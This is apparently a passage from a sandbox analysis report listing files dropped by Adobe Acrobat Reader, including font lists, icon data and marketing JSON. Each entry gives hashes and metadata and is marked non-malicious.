                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):1233
                                                                Entropy (8bit):5.233980037532449
                                                                Encrypted:false
                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):10880
                                                                Entropy (8bit):5.214360287289079
                                                                Encrypted:false
                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):10880
                                                                Entropy (8bit):5.214360287289079
                                                                Encrypted:false
                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):236498
                                                                Entropy (8bit):3.3531408405555108
                                                                Encrypted:false
                                                                SSDEEP:1536:vKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgFhr9oL+jn:yPCaJ/3AYvYwgLRoL+jn
                                                                MD5:301FED88622318B6F7E375BD7C79B592
                                                                SHA1:27D649095122D5A10674552C73FBC15730BD3F92
                                                                SHA-256:AF170261C3E991F0964E3A64905474963D52EDAC99C697907A6A92BE611876E9
                                                                SHA-512:E0265447F11119ABB3B7014E3B029D4891CB9D3A4A159E12C4291A7E86590FEEBC1035BC9284A1557C9E672388F3749AB2AC4E804FACBCE945C94647C04E79A1
                                                                Malicious:false
                                                                Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):295
                                                                Entropy (8bit):5.383151696279362
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJM3g98kUwPeUkwRe9:YvXKX2zUV6FWRuUhUfOGMbLUkee9
                                                                MD5:01AAA9E3D004E922B89C7807D2CE9641
                                                                SHA1:11DAE2FE8390507DD56ABDF314B7896D0355270C
                                                                SHA-256:E42ADFF5F97E8203719DCBACA902613530C290C9C3A4FB47A1F5C1C68230BA75
                                                                SHA-512:6DED1A3561DBED80E2C89D5A5E458FD5BD506CB10A1703047030B891295418F4577B0257BA8C70C21E3260D0C59AA53ADD472D00B4F79388BB3EC61FB2303AA6
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.335523977226031
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfBoTfXpnrPeUkwRe9:YvXKX2zUV6FWRuUhUfOGWTfXcUkee9
                                                                MD5:2CD75C5A44F967F3BAAD913F70AE9C58
                                                                SHA1:671E25255A713B65FCFC234C914D3F6DFC623ACF
                                                                SHA-256:3EC693A913B04C1027FB6C283A82A2805998A165AE553ABA81B2D75A19B1FA3A
                                                                SHA-512:0900D0B4D8BFEA97F7F305F678A8FFC3B455F6746E40E7CE8E56AFA0BD2C47ACF06E298FF80F92D1344821F543428C2B7C1B0AFE4F6F135A4BA5EDE827F12BE6
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.313476577225391
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfBD2G6UpnrPeUkwRe9:YvXKX2zUV6FWRuUhUfOGR22cUkee9
                                                                MD5:9843794161C05E1BE78C9DAB52E23916
                                                                SHA1:11A25D62AB752F43B27AE20636E45F989824586B
                                                                SHA-256:358CE5A185017B3C53B57418D22D5DA7BA9FA3B65278DABB967BD910BCD6DA10
                                                                SHA-512:4C4C277A06DD4AA8C138CE25AA5D4D9CE1318A8C83BC136D156D1C16A670882BF0BE49FCD01D4DC0029ECC2E848840BAD757AE40EC56D3269A231FB8821C1204
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):285
                                                                Entropy (8bit):5.372226211685696
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfPmwrPeUkwRe9:YvXKX2zUV6FWRuUhUfOGH56Ukee9
                                                                MD5:22FDA7ED41002C762DD13476C6F6C958
                                                                SHA1:3FD4ACEB009D8F891D9068C3481D422114F1DF82
                                                                SHA-256:8CB7C7337FE4085C46DA1B0D112F1D3FC2AF8EED53B43DF6476359BA843D7558
                                                                SHA-512:6FAC20F67B49064B7B7B69113647A944C8410637621EF4D5F74B5B7E6F962B4FB22160E3D4A8CFBFB85C7F09418943B4B86181C2E581F7DBFAC6ED3B2E3388E9
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1123
                                                                Entropy (8bit):5.688063195159013
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6X5VVUf7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSA:YvUVUzhgy6SAFv5Ah8cv/A
                                                                MD5:2E7C229212E414624895B9B87B55F779
                                                                SHA1:1F6CA944697FB3D5A141078648D49478AB256086
                                                                SHA-256:444DC93335B1570E8A962949290B555B46657F1C61956DCA62C4CAAE0555C0B9
                                                                SHA-512:3979EEBB942BF227AFB4809B0B8936A636EB568DB0AC549D5F6AC0F3E2EFAF45263C69165EAEBC329298767E4A26CFF3ECA231381C19F85E3A36D9EE1E587EAF
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.320003741693764
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJf8dPeUkwRe9:YvXKX2zUV6FWRuUhUfOGU8Ukee9
                                                                MD5:0F13B231E41829B21A95B8CA3C783097
                                                                SHA1:A3852B8631320B6D9673380B0A174E5AC392BFAF
                                                                SHA-256:2B2B5F957D91C14229FE92EFEEC58AC520EEC49513A00E58E7A88F9ED7AEB15F
                                                                SHA-512:CC5BA3DA3ECB927E975BA2802604707C38CA59972129B68F07279DB1968CBFD6EC275C99FA9125DCFD548860176C8E4CC827949CC3F96200B6BBC26CA5D5F64D
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):292
                                                                Entropy (8bit):5.323050272719305
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfQ1rPeUkwRe9:YvXKX2zUV6FWRuUhUfOGY16Ukee9
                                                                MD5:0D7DDCC9F9BABB47EFB486C1EC26732E
                                                                SHA1:00BD582EF7526AD6CD7D9D56A446EF43C772118F
                                                                SHA-256:79340FC002C8BE740BD9C69F1188512BF34395795C6A7ECDFB0B65493D3E1B7B
                                                                SHA-512:6A7D6F1C35572DBC2F799364C226DFAA716B16DF815C45475C5917AFEB2901C97CF5BA48E0C0D4BB67302AC24DE6D797C824AEE28BAAFDC3B2850B8A6E9790E1
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.328470926373368
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfFldPeUkwRe9:YvXKX2zUV6FWRuUhUfOGz8Ukee9
                                                                MD5:9A61CC9C74B10603AE8E45273236BC9C
                                                                SHA1:C58A07A8480BBAE05F25EF61645F09E17EE10871
                                                                SHA-256:7413D4BF48DCF80D9AF6D137B9F15D3F509EB5738D4CF7AFD87F54D51ED8354D
                                                                SHA-512:326D036BE5974376E8C467128B3F5C8E5B4460B0D9E5AE73F4347C59C79FD396CA7EE86F46B8ACD42827B5B2CD9637ACFA5CBA862227B29D2806D23B05019D38
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):295
                                                                Entropy (8bit):5.3457097248976115
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfzdPeUkwRe9:YvXKX2zUV6FWRuUhUfOGb8Ukee9
                                                                MD5:FE64C0CA44B319C8ACA75E31369D18BE
                                                                SHA1:A3F957FB0C87C29ABDA6E9DC345CB75609DCD8AB
                                                                SHA-256:6D72841A9B6C82E1520C4403220A707238B30FD2C683866462B7EF2F3219EA96
                                                                SHA-512:A63F6BCC6A1FE14D8CC60016522CD99F923A1065E488EAD5DA777386E5495F22F5DF039D30218D5165087E694D6BF429D068FDD13CC052D0FE69D33474467466
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):289
                                                                Entropy (8bit):5.3269004456085804
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfYdPeUkwRe9:YvXKX2zUV6FWRuUhUfOGg8Ukee9
                                                                MD5:9B47C50B9B7F6E7D21343BCE407C7BF0
                                                                SHA1:868678D0D77DF7CEAC90E2BA3495812274476F8A
                                                                SHA-256:565FE413C85CCE29D5FA48B30C2119063494A8F901F48421A218C226D9058D1F
                                                                SHA-512:F483D071BFB666CE8340B3F03C9B549160D639E8B57683EDB6DF25EBAA158170AD6034B639ECEC6FC49DDC395705DCE5E2E6D474AF661578C65CEC7F7DBA1B52
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):284
                                                                Entropy (8bit):5.31310671629293
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJf+dPeUkwRe9:YvXKX2zUV6FWRuUhUfOG28Ukee9
                                                                MD5:B5534B1D6ABDBF235C8643BECF08683E
                                                                SHA1:2CBBC19BA72B7736C328EB4DE6EF0B934D0A0E6C
                                                                SHA-256:158D3C21C3F8CB10A607AB0D1AF9A4F8DB939EDC3ADE224CE72D78DC0FA6FB27
                                                                SHA-512:F16810F652A84F93C2E0FA67083BAB20CEA732C2ABC0336410D512070181657AA45C53548D499ABDD55494131071AF40CAAC564FBDD3C8AB24636608A6E6AE1B
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):291
                                                                Entropy (8bit):5.310262660494756
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfbPtdPeUkwRe9:YvXKX2zUV6FWRuUhUfOGDV8Ukee9
                                                                MD5:9EBC6BD6C9F2B577948B1CFD811A2532
                                                                SHA1:45E72E629B2B54EBDFC36487E5530F2954242758
                                                                SHA-256:BCD6EEF91EE84DE0675142BD3F6ADCE0E5B09AE9936A57996F828F005FF5DABE
                                                                SHA-512:3E573B47897178E37F7073820F17595D06723C67EFFA834BF70855E25D81E3E5C225B945CC096F97D3F702C0BEF4D5A9152E9E57704B0B869494DA101CD7D6A4
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):287
                                                                Entropy (8bit):5.314016323147298
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJf21rPeUkwRe9:YvXKX2zUV6FWRuUhUfOG+16Ukee9
                                                                MD5:9C5BE9253777844C876BD5F93BDDBAE1
                                                                SHA1:21B8D0570DDFAECB8E6758EE8C40BF7E5BCDC926
                                                                SHA-256:AF8C22E911B1749B30947579A4A32D5E8345F815DBC6B9556A7C32AE403812F5
                                                                SHA-512:9FA93E04A50A6C144C29AE5E507F3459BEA2F1C000455EA2E0C4F22AD40E753F000FB8E8581FDAA9BAEC36E37B421213E17E510C4F9798AFB8F87BA4C3AB3EB4
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1090
                                                                Entropy (8bit):5.66142596313259
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6X5VVUf7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSA:YvUVUzBgkDMUJUAh8cvMA
                                                                MD5:8E030A01A76D1C1CDB3DD32229EC1032
                                                                SHA1:FF66B96FA1C07E41BF8C218B6C5F86C475BB29C4
                                                                SHA-256:B22CEFD4BD9DB894D83E38B16DB9EC9A3D86B0C23B960626D9622ABC696B3F52
                                                                SHA-512:F158C75EF9C20178E23D98C237AFA7A2EC8DFD5DDE5C8E836C697B4A813C289E7BEAFB9F44D1093A531F88D0F5E78EAC221477A97807A62F86B538470FEA453B
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):286
                                                                Entropy (8bit):5.288290893581731
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJfshHHrPeUkwRe9:YvXKX2zUV6FWRuUhUfOGUUUkee9
                                                                MD5:CF4322472DE8589712642A1956327B60
                                                                SHA1:A6E5A35F7345110EE186FFD56BFDB6D535BFC97F
                                                                SHA-256:46109C72397CA453E8DBF0433A658ADD737BF04180E0C31E9F5EC22251821B18
